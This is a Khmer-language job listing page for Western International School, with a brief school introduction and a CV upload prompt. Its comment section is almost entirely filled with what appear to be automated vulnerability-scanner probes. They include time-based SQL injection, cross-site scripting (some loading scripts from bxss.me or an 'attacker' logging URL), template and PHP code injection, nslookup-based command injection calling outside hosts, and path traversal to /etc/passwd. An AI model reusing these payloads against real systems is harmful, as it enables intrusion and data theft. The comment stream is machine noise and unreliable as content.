ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

សាលាវេស្ទើនអន្តរជាតិ
សេចក្តីផ្តើម
សាលាវេស្ទើនអន្តរជាតិគឺជាសាលាឯកជនមួយដែលត្រូវបានបង្កើតឡើងនៅថ្ងៃទី ១ ខែកញ្ញាឆ្នាំ ២០០៣ ។សាលាវេស្ទើនអន្តរជាតិ មានផ្តល់ជូនការអប់រំចំណេះទូទៅ ចាប់ពីថ្នាក់ក្រោមមត្តេយ្យ ដល់ថ្នាក់ទី ១២ ជាភាសាអង់គ្លេសនិងភាសាខ្មែរ (ភាសាផ្លូវការនៅកម្ពុជា) ។ ថ្នាក់សិក្សាមានពីរវេនគឺ ថ្នាក់សិស្សាតែមួយពេលឬក្រៅម៉ោងសម្រាប់ពេលព្រឹកឬពេលរសៀល ហើយស្ទើរតែគ្រប់មុខវិជ្ជាទាំងអស់ជាភាសាអង់គ្លេសលើកលែងតែមុខវិជ្ជាភាសារខ្មែរនិង អប់រំកាយ។ សំរាប់ថ្នាក់ពេញម៉ោងពេញមួយថ្ងៃ សិស្សសិក្សាកម្មវិធីចំនួនពីរមុខ៖ កម្មវិធីសិក្សារបស់ក្រសួងអប់រំ (ជាភាសាខ្មែរ) និងកម្មវិធីសិក្សារបស់អាមេរិក (ជាភាសាអង់គ្លេស) ។


ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 62

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 37 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 08:10:48


  @@OnyHg


 • pHqghUme

  2021-05-06 08:10:43


  1'"


 • pHqghUme

  2021-05-06 08:10:42


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 08:10:14


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 08:09:46


  ozPANdYb')) OR 812=(SELECT 812 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:09:19


  kMK7Lqib') OR 727=(SELECT 727 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:09:01


  8tcNEdt0' OR 281=(SELECT 281 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:08:36


  -1)) OR 156=(SELECT 156 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:08:05


  -5) OR 542=(SELECT 542 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:07:35


  -5 OR 693=(SELECT 693 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:07:07


  7sCDFBzr'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:06:38


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:06:12


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:05:46


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:05:22


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 08:04:52


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 08:04:24


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 08:04:00


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 08:03:39


  -1" OR 2+174-174-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:03:38


  -1' OR 2+178-178-1=0+0+0+1 or 'rVMwk5Td'='


 • pHqghUme

  2021-05-06 08:03:37


  -1' OR 2+319-319-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:03:36


  -1 OR 2+591-591-1=0+0+0+1


 • pHqghUme

  2021-05-06 08:03:35


  -1 OR 2+599-599-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:03:12


  LW60eU1T


 • pHqghUme

  2021-05-06 08:03:08


  1


 • pHqghUme

  2021-05-06 08:03:05


  1


 • @@sd8WK

  2021-05-06 08:03:02


  1


 • 1'"

  2021-05-06 08:03:00


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 08:02:58


  1


 • 160TnZzs')) OR 634=(SELECT 634 FROM PG_SLEEP(15))--

  2021-05-06 08:02:55


  1


 • ltOfYe2A') OR 943=(SELECT 943 FROM PG_SLEEP(15))--

  2021-05-06 08:02:51


  1


 • dVpQuox4' OR 422=(SELECT 422 FROM PG_SLEEP(15))--

  2021-05-06 08:02:47


  1


 • F8DIEUc9'; waitfor delay '0:0:15' --

  2021-05-06 08:02:44


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 08:02:41


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 08:02:37


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 08:02:33


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 08:02:27


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 08:02:22


  1


 • -1' OR 2+766-766-1=0+0+0+1 or '3NidvudU'='

  2021-05-06 08:02:15


  1


 • -1" OR 2+819-819-1=0+0+0+1 --

  2021-05-06 08:02:15


  1


 • -1 OR 2+247-247-1=0+0+0+1

  2021-05-06 08:02:14


  1


 • -1' OR 2+942-942-1=0+0+0+1 --

  2021-05-06 08:02:14


  1


 • -1 OR 2+811-811-1=0+0+0+1 --

  2021-05-06 08:02:13


  1


 • Bm9XBxq2

  2021-05-06 08:02:10


  1


 • pHqghUme

  2021-05-06 08:02:02


  1


 • pHqghUme

  2021-05-06 08:01:54


  1


 • pHqghUme

  2021-05-06 08:01:47


  1


 • pHqghUme

  2021-05-06 08:01:45


  1


 • pHqghUme

  2021-05-06 08:01:44


  1


 • pHqghUme

  2021-05-06 08:01:35


  1


 • pHqghUme

  2021-05-06 08:01:27


  1


 • pHqghUme

  2021-05-06 08:01:20


  1


 • pHqghUme

  2021-05-06 08:01:11


  1


 • pHqghUme

  2021-05-06 08:01:02


  1


 • pHqghUme

  2021-05-06 08:00:52


  1


 • pHqghUme

  2021-05-06 08:00:44


  1


 • pHqghUme

  2021-05-06 08:00:34


  1


 • pHqghUme

  2021-05-06 08:00:20


  1


 • pHqghUme

  2021-05-06 08:00:10


  1


 • pHqghUme

  2021-05-06 08:00:10


  1


 • pHqghUme

  2021-05-06 08:00:09


  1


 • pHqghUme

  2021-05-06 08:00:08


  1


 • pHqghUme

  2021-05-06 08:00:07


  1


 • pHqghUme

  2021-05-06 08:00:07


  1


 • pHqghUme

  2021-05-06 07:59:56


  1


 • pHqghUme

  2021-05-06 07:59:40


  1


 • pHqghUme

  2021-05-06 07:59:34


  1<0OB55D<


 • pHqghUme

  2021-05-06 07:59:31


  1<img sRc='http://attacker-9304/log.php?


 • pHqghUme

  2021-05-06 07:59:27


  1<6ludZ8 x=9560>


 • pHqghUme

  2021-05-06 07:59:26


  1


 • pHqghUme

  2021-05-06 07:59:24


  1


 • pHqghUme

  2021-05-06 07:59:22


  1<ifRAme sRc=9263.com></IfRamE>


 • pHqghUme

  2021-05-06 07:59:17


  1<W7K0D2>78ONY[!+!]</W7K0D2>


 • pHqghUme

  2021-05-06 07:59:13


  1mvzgc <ScRiPt >GQ5b(9868)</ScRiPt>


 • pHqghUme

  2021-05-06 07:59:08


  1


 • pHqghUme

  2021-05-06 07:59:07


  1<% contenteditable onresize=GQ5b(9178)>


 • pHqghUme

  2021-05-06 07:59:03


  1}body{acu:Expre/**/SSion(GQ5b(9708))}


 • pHqghUme

  2021-05-06 07:58:58


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 07:58:54


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 07:58:53


  1


 • pHqghUme

  2021-05-06 07:58:50


  1<input autofocus onfocus=GQ5b(9741)>


 • pHqghUme

  2021-05-06 07:58:41


  1&lt;ScRiPt&gt;GQ5b(9495)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 07:58:40


  1


 • pHqghUme

  2021-05-06 07:58:36


  1\u003CScRiPt\GQ5b(9350)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 07:58:30


  %31%3C%53%63%52%69%50%74%20%3E%47%51%35%62%289348%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 07:58:27


  1


 • pHqghUme

  2021-05-06 07:58:20


  1<img/src=">" onerror=alert(9099)>


 • pHqghUme

  2021-05-06 07:58:16


  1


 • pHqghUme

  2021-05-06 07:58:14


  1<img src=xyz OnErRor=GQ5b(9943)>


 • pHqghUme

  2021-05-06 07:58:07


  1<img src=//xss.bxss.me/t/dot.gif onload=GQ5b(9359)>


 • pHqghUme

  2021-05-06 07:58:06


  1


 • pHqghUme

  2021-05-06 07:58:03


  1<body onload=GQ5b(9334)>


 • pHqghUme

  2021-05-06 07:57:58


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9095'>


 • pHqghUme

  2021-05-06 07:57:57


  1


 • pHqghUme

  2021-05-06 07:57:53


  1<isindex type=image src=1 onerror=GQ5b(9298)>


 • pHqghUme

  2021-05-06 07:57:48


  1<ScRiPt >GQ5b(9471)</ScRiPt>


 • pHqghUme

  2021-05-06 07:57:48


  1


 • pHqghUme

  2021-05-06 07:57:43


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9571></ScRiPt>


 • pHqghUme

  2021-05-06 07:57:36


  1<ScRiPt >GQ5b(9082)</ScRiPt>


 • pHqghUme

  2021-05-06 07:57:36


  1


 • pHqghUme

  2021-05-06 07:57:31


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%47%51%35%62%28%39%36%39%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 07:57:25


  1<script>GQ5b(9612)</script>


 • pHqghUme

  2021-05-06 07:57:24


  1


 • pHqghUme

  2021-05-06 07:57:20


  1<WRNBQ8>4V9PE[!+!]</WRNBQ8>


 • pHqghUme

  2021-05-06 07:57:13


  1<ScRiPt >GQ5b(9583)</ScRiPt>


 • pHqghUme

  2021-05-06 07:57:11


  1


 • pHqghUme

  2021-05-06 07:57:10


  1


 • pHqghUme

  2021-05-06 07:57:07


  1


 • pHqghUme

  2021-05-06 07:57:06


  1


 • pHqghUme

  2021-05-06 07:57:05


  1


 • pHqghUme

  2021-05-06 07:57:05


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 07:57:04


  1


 • pHqghUme

  2021-05-06 07:56:59


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 07:56:52


  1


 • pHqghUme

  2021-05-06 07:56:51


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 07:56:44


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 07:56:38


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:56:38


  1


 • pHqghUme

  2021-05-06 07:56:34


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 07:56:28


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:56:20


  acux1018%C0%BEz1%C0%BCz2a%90bcxuca1018


 • pHqghUme

  2021-05-06 07:56:12


  acu3589%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3589


 • pHqghUme

  2021-05-06 07:56:07


  19162187


 • pHqghUme

  2021-05-06 07:56:02


  '"()&%<acx><ScRiPt >GQ5b(9227)</ScRiPt>


 • pHqghUme

  2021-05-06 07:55:57


  1'"()&%<acx><ScRiPt >GQ5b(9719)</ScRiPt>


 • pHqghUme<F5iV3e<

  2021-05-06 07:55:52


  1


 • pHqghUme<img sRc='http://attacker-9173/log.php?

  2021-05-06 07:55:47


  1


 • pHqghUme<eMzqnP x=9405>

  2021-05-06 07:55:37


  1


 • pHqghUme<ifRAme sRc=9124.com></IfRamE>

  2021-05-06 07:55:31


  1


 • pHqghUme<WJ6PZM>U4EV0[!+!]</WJ6PZM>

  2021-05-06 07:55:23


  1


 • pHqghUmerCtsb <ScRiPt >GQ5b(9700)</ScRiPt>

  2021-05-06 07:55:14


  1


 • pHqghUme<% contenteditable onresize=GQ5b(9921)>

  2021-05-06 07:55:05


  1


 • pHqghUme}body{acu:Expre/**/SSion(GQ5b(9328))}

  2021-05-06 07:54:58


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 07:54:50


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 07:54:43


  1


 • pHqghUme<input autofocus onfocus=GQ5b(9622)>

  2021-05-06 07:54:37


  1


 • pHqghUme&lt;ScRiPt&gt;GQ5b(9581)&lt;/sCripT&gt;

  2021-05-06 07:54:26


  1


 • pHqghUme\u003CScRiPt\GQ5b(9672)\u003C/sCripT\u003E

  2021-05-06 07:54:18


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%47%51%35%62%289271%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 07:54:11


  1


 • pHqghUme<img/src=">" onerror=alert(9655)>

  2021-05-06 07:54:02


  1


 • pHqghUme<img src=xyz OnErRor=GQ5b(9463)>

  2021-05-06 07:53:56


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=GQ5b(9157)>

  2021-05-06 07:53:51


  1


 • pHqghUme<body onload=GQ5b(9943)>

  2021-05-06 07:53:45


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9385'>

  2021-05-06 07:53:38


  1


 • pHqghUme<isindex type=image src=1 onerror=GQ5b(9656)>

  2021-05-06 07:53:32


  1


 • pHqghUme<ScRiPt >GQ5b(9040)</ScRiPt>

  2021-05-06 07:53:24


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9667></ScRiPt>

  2021-05-06 07:53:16


  1


 • pHqghUme<ScRiPt >GQ5b(9922)</ScRiPt>

  2021-05-06 07:53:08


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%47%51%35%62%28%39%31%39%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 07:53:04


  1


 • pHqghUme<script>GQ5b(9513)</script>

  2021-05-06 07:52:58


  1


 • pHqghUme<WW88DF>8VRK7[!+!]</WW88DF>

  2021-05-06 07:52:52


  1


 • pHqghUme<ScRiPt >GQ5b(9861)</ScRiPt>

  2021-05-06 07:52:46


  1


 • pHqghUme

  2021-05-06 07:52:40


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 07:52:35


  1


 • acx__${98991*97996}__::.x

  2021-05-06 07:52:30


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 07:52:26


  1


 • pHqghUme

  2021-05-06 07:52:26


  1


 • acx{{98991*97996}}xca

  2021-05-06 07:52:20


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 07:52:15


  1


 • <th:t="${acx}#foreach

  2021-05-06 07:52:11


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 07:52:07


  1


 • acux3341%C0%BEz1%C0%BCz2a%90bcxuca3341

  2021-05-06 07:52:02


  1


 • acu10799%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca10799

  2021-05-06 07:51:57


  1


 • pHqghUme9268131

  2021-05-06 07:51:52


  1


 • '"()&%<acx><ScRiPt >GQ5b(9023)</ScRiPt>

  2021-05-06 07:51:45


  1


 • pHqghUme'"()&%<acx><ScRiPt >GQ5b(9507)</ScRiPt>

  2021-05-06 07:51:37


  1


 • pHqghUme

  2021-05-06 07:51:28


  1


 • pHqghUme

  2021-05-06 07:51:21


  1


 • pHqghUme

  2021-05-06 07:51:15


  1


 • pHqghUme

  2021-05-06 07:51:09


  1


 • pHqghUme

  2021-05-06 07:51:02


  1


 • pHqghUme

  2021-05-06 07:50:58


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 07:50:57


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 07:50:56


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 07:50:56


  1


 • pHqghUme

  2021-05-06 07:50:55


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 07:50:54


  <!--


 • pHqghUme

  2021-05-06 07:50:54


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 07:50:53


  '"


 • pHqghUme

  2021-05-06 07:50:53


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • <!--

  2021-05-06 07:50:52


  1


 • '.print(md5(31337)).'

  2021-05-06 07:50:52


  1


 • '"

  2021-05-06 07:50:51


  1


 • ${@print(md5(31337))}\

  2021-05-06 07:50:51


  1


 • pHqghUme

  2021-05-06 07:50:50


  1


 • ${@print(md5(31337))}

  2021-05-06 07:50:50


  1


 • pHqghUme

  2021-05-06 07:50:49


  1


 • ';print(md5(31337));$a='

  2021-05-06 07:50:49


  1


 • pHqghUme

  2021-05-06 07:50:49


  1


 • ";print(md5(31337));$a="

  2021-05-06 07:50:49


  1


 • pHqghUme

  2021-05-06 07:50:48


  1


 • pHqghUme

  2021-05-06 07:50:48


  /xfs.bxss.me


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 07:50:48


  1


 • /xfs.bxss.me

  2021-05-06 07:50:47


  1


 • pHqghUme

  2021-05-06 07:50:47


  1


 • pHqghUme

  2021-05-06 07:50:46


  1


 • pHqghUme

  2021-05-06 07:50:46


  1


 • pHqghUme

  2021-05-06 07:50:45


  1


 • pHqghUme

  2021-05-06 07:50:45


  1


 • pHqghUme

  2021-05-06 07:50:45


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 07:50:44


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 07:50:44


  1


 • pHqghUme

  2021-05-06 07:50:43


  '"()


 • pHqghUme

  2021-05-06 07:50:43


  1


 • pHqghUme

  2021-05-06 07:50:43


  '+'A'.concat(70-3).concat(22*4).concat(116).concat(90).concat(116).concat(83)+(require'socket' Socket.gethostbyname('hitaw'+'eftrviejbd5ce.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 07:50:43


  1


 • pHqghUme

  2021-05-06 07:50:42


  1


 • pHqghUme

  2021-05-06 07:50:42


  "+"A".concat(70-3).concat(22*4).concat(115).concat(89).concat(117).concat(80)+(require"socket" Socket.gethostbyname("hitkr"+"zkagggryf90ab.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 07:50:42


  1


 • "+"A".concat(70-3).concat(22*4).concat(113).concat(70).concat(107).concat(82)+(require"socket" Socket.gethostbyname("hitan"+"qwqymreb019e3.bxss.me.")[3].to_s)+"

  2021-05-06 07:50:41


  1


 • pHqghUme

  2021-05-06 07:50:41


  1


 • '+'A'.concat(70-3).concat(22*4).concat(113).concat(90).concat(116).concat(68)+(require'socket' Socket.gethostbyname('hitgg'+'wdkfqyhb72d1a.bxss.me.')[3].to_s)+'

  2021-05-06 07:50:41


  1


 • pHqghUme

  2021-05-06 07:50:40


  1


 • pHqghUme

  2021-05-06 07:50:40


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 07:50:40


  1


 • pHqghUme

  2021-05-06 07:50:40


  1


 • pHqghUme

  2021-05-06 07:50:39


  HttP://bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 07:50:39


  1


 • pHqghUme

  2021-05-06 07:50:39


  1


 • pHqghUme

  2021-05-06 07:50:39


  `(nslookup hitxeiglnjwwmf7c46.bxss.me||perl -e "gethostbyname('hitxeiglnjwwmf7c46.bxss.me')")`


 • pHqghUme

  2021-05-06 07:50:38


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 07:50:38


  1


 • pHqghUme

  2021-05-06 07:50:38


  1


 • pHqghUme

  2021-05-06 07:50:38


  |(nslookup hitxktthhuxcp974f5.bxss.me||perl -e "gethostbyname('hitxktthhuxcp974f5.bxss.me')")


 • pHqghUme

  2021-05-06 07:50:38


  1


 • '"()

  2021-05-06 07:50:38


  1


 • pHqghUme

  2021-05-06 07:50:37


  1


 • pHqghUme

  2021-05-06 07:50:37


  ".gethostbyname(lc("hitjy"."gdudlahk827f4.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(80).chr(107).chr(82)."


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 07:50:37


  1


 • pHqghUme

  2021-05-06 07:50:37


  1


 • pHqghUme

  2021-05-06 07:50:36


  1


 • pHqghUme

  2021-05-06 07:50:36


  '.gethostbyname(lc('hitrd'.'zlrfqjho5d68c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(67).chr(107).chr(79).'


 • pHqghUme

  2021-05-06 07:50:35


  1


 • pHqghUme

  2021-05-06 07:50:35


  1


 • pHqghUme

  2021-05-06 07:50:35


  $(nslookup hittdfunqqgiic81fd.bxss.me||perl -e "gethostbyname('hittdfunqqgiic81fd.bxss.me')")


 • ".gethostbyname(lc("hitnd"."jatdvlxu26840.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(89).chr(112).chr(66)."

  2021-05-06 07:50:35


  1


 • '.gethostbyname(lc('hitqr'.'cujcrvane9fa5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(79).chr(106).chr(76).'

  2021-05-06 07:50:34


  1


 • pHqghUme

  2021-05-06 07:50:34


  (nslookup hitnjqrvvvplmfaec1.bxss.me||perl -e "gethostbyname('hitnjqrvvvplmfaec1.bxss.me')")


 • pHqghUme

  2021-05-06 07:50:33


  1


 • pHqghUme

  2021-05-06 07:50:33


  |echo wuxaba$()\ iytaal\nz^xyu||a #' |echo wuxaba$()\ iytaal\nz^xyu||a #|" |echo wuxaba$()\ iytaal\nz^xyu||a #


 • pHqghUme

  2021-05-06 07:50:33


  1


 • pHqghUme

  2021-05-06 07:50:32


  1


 • pHqghUme

  2021-05-06 07:50:32


  &echo yamfdg$()\ zznhpt\nz^xyu||a #' &echo yamfdg$()\ zznhpt\nz^xyu||a #|" &echo yamfdg$()\ zznhpt\nz^xyu||a #


 • pHqghUme

  2021-05-06 07:50:31


  1


 • pHqghUme

  2021-05-06 07:50:31


  1


 • pHqghUme

  2021-05-06 07:50:31


  echo hwbmpl$()\ ndsyeq\nz^xyu||a #' &echo hwbmpl$()\ ndsyeq\nz^xyu||a #|" &echo hwbmpl$()\ ndsyeq\nz^xyu||a #


 • pHqghUme

  2021-05-06 07:50:30


  1


 • pHqghUme

  2021-05-06 07:50:28


  bxss.me


 • `(nslookup hitlhflooqjofb053b.bxss.me||perl -e "gethostbyname('hitlhflooqjofb053b.bxss.me')")`

  2021-05-06 07:50:27


  1


 • pHqghUme

  2021-05-06 07:50:27


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 07:50:27


  1&n937316=v948525


 • |(nslookup hithlvrafmxwla2147.bxss.me||perl -e "gethostbyname('hithlvrafmxwla2147.bxss.me')")

  2021-05-06 07:50:26


  1


 • pHqghUme

  2021-05-06 07:50:26


  Http://bxss.me/t/fit.txt


 • pHqghUme

  2021-05-06 07:50:25


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 07:50:25


  1some_inexistent_file_with_long_name%00.jpg


 • pHqghUme

  2021-05-06 07:50:24


  !(()&&!|*|*|


 • pHqghUme

  2021-05-06 07:50:24


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 07:50:23


  1


 • pHqghUme

  2021-05-06 07:50:23


  )


 • pHqghUme&n931190=v969473

  2021-05-06 07:50:23


  1


 • bxss.me

  2021-05-06 07:50:23


  1


 • !(()&&!|*|*|

  2021-05-06 07:50:22


  1


 • Http://bxss.me/t/fit.txt

  2021-05-06 07:50:22


  1


 • (nslookup hitnoqoroikhi57511.bxss.me||perl -e "gethostbyname('hitnoqoroikhi57511.bxss.me')")

  2021-05-06 07:50:22


  1


 • ^(#$!@#$)(()))******

  2021-05-06 07:50:22


  1


 • $(nslookup hitmykbjtskmya850d.bxss.me||perl -e "gethostbyname('hitmykbjtskmya850d.bxss.me')")

  2021-05-06 07:50:22


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 07:50:21


  1


 • )

  2021-05-06 07:50:21


  1


 • |echo hvuwli$()\ yqeyhu\nz^xyu||a #' |echo hvuwli$()\ yqeyhu\nz^xyu||a #|" |echo hvuwli$()\ yqeyhu\nz^xyu||a #

  2021-05-06 07:50:21


  1


 • pHqghUme

  2021-05-06 07:50:20


  1


 • echo hmrllk$()\ eojhsa\nz^xyu||a #' &echo hmrllk$()\ eojhsa\nz^xyu||a #|" &echo hmrllk$()\ eojhsa\nz^xyu||a #

  2021-05-06 07:50:20


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 07:50:20


  1


 • &echo nywhru$()\ nozfyy\nz^xyu||a #' &echo nywhru$()\ nozfyy\nz^xyu||a #|" &echo nywhru$()\ nozfyy\nz^xyu||a #

  2021-05-06 07:50:20


  1


 • pHqghUme

  2021-05-06 07:50:19


  1


 • pHqghUme

  2021-05-06 07:50:19


  1


 • pHqghUme

  2021-05-06 07:50:19


  1


 • pHqghUme

  2021-05-06 07:50:18


  1


 • pHqghUme

  2021-05-06 07:50:18


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • pHqghUme

  2021-05-06 07:50:18


  1


 • pHqghUme

  2021-05-06 07:50:18


  1


 • pHqghUme

  2021-05-06 07:50:17


  1


 • pHqghUme

  2021-05-06 07:50:16


  1


 • pHqghUme

  2021-05-06 07:50:16


  1


 • pHqghUme

  2021-05-06 07:50:16


  1


 • pHqghUme

  2021-05-06 07:50:16


  1


 • pHqghUme

  2021-05-06 07:50:15


  1


 • pHqghUme

  2021-05-06 07:50:15


  1


 • pHqghUme

  2021-05-06 07:50:15


  1


 • pHqghUme

  2021-05-06 07:50:15


  1


 • pHqghUme

  2021-05-06 07:50:13


  1


 • pHqghUme

  2021-05-06 07:50:12


  1


 • pHqghUme

  2021-05-06 07:50:12


  1


 • pHqghUme

  2021-05-06 07:50:11


  1


 • pHqghUme

  2021-05-06 07:50:11


  1


 • pHqghUme

  2021-05-06 07:50:11


  1


 • pHqghUme

  2021-05-06 07:50:10


  1


 • pHqghUme

  2021-05-06 07:50:10


  1


 • pHqghUme

  2021-05-06 07:50:09


  1


 • dURmeWgxeXk=

  2021-05-06 07:50:09


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 07:50:09


  1


 • pHqghUme

  2021-05-06 07:50:07


  ../1


 • pHqghUme

  2021-05-06 07:50:06


  ${10000276+9999773}


 • pHqghUme

  2021-05-06 07:50:06


  1


 • pHqghUme

  2021-05-06 07:50:05


  1


 • pHqghUme

  2021-05-06 07:50:05


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 07:50:04


  1


 • ${9999588+9999274}

  2021-05-06 07:50:04


  1


 • pHqghUme

  2021-05-06 07:50:04


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 07:50:03


  1


 • pHqghUme

  2021-05-06 07:50:03


  1


 • ../pHqghUme

  2021-05-06 07:50:03


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 07:50:02


  1


 • pHqghUme

  2021-05-06 07:50:02


  1


 • pHqghUme

  2021-05-06 07:50:02


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 07:50:01


  1


 • pHqghUme

  2021-05-06 07:50:00


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 07:50:00


  1


 • pHqghUme

  2021-05-06 07:49:59


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 07:49:59


  1


 • pHqghUme

  2021-05-06 07:49:59


  1


 • pHqghUme

  2021-05-06 07:49:59


  1


 • pHqghUme

  2021-05-06 07:49:58


  1


 • pHqghUme

  2021-05-06 07:49:58


  1


 • pHqghUme

  2021-05-06 07:49:57


  1


 • pHqghUme

  2021-05-06 07:49:57


  1


 • pHqghUme

  2021-05-06 07:49:57


  1


 • pHqghUme

  2021-05-06 07:49:57


  1


 • pHqghUme

  2021-05-06 07:49:56


  1


 • pHqghUme

  2021-05-06 07:49:56


  1


 • pHqghUme

  2021-05-06 07:49:56


  1


 • pHqghUme

  2021-05-06 07:49:55


  1


 • pHqghUme

  2021-05-06 07:49:55


  1


 • pHqghUme

  2021-05-06 07:49:55


  "+response.write(9028633*9268362)+"


 • pHqghUme

